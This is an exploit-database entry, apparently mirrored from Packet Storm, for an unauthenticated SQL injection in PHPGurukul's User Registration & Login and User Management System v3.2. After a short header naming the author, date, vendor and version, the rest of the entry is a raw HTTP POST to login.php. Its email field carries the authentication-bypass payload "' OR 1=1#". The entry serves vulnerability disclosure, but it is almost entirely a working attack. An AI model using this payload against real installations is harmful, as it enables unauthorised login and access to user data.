Share
## https://sploitus.com/exploit?id=PACKETSTORM:177935
# Exploit Title: User Registration & Login and User Management System v3.2 - SQL Injection (Unauthenticated)  
# Exploit Author: Yusuf DİNÇ  
# Google Dork: NA  
# Date: 05/03/2024  
# Vendor Homepage: https://phpgurukul.com  
# Software Link:  
https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/  
# Version: 3.2  
# Tested on: Linux  
  
  
POST /test/loginsystem/login.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 53  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/test/loginsystem/login.php  
Cookie: csrftoken=WYNmntI3xnkUlg89ElNUCBp6mFVAZel8; sessionid=t5apbvw2jdnur3uvudxt8mcn7cdudbi5; PHPSESSID=1mnimk5b1591oukpi0kh90n0hv  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
  
uemail=test%40gmail.com'+OR+1=1#&password=test&login=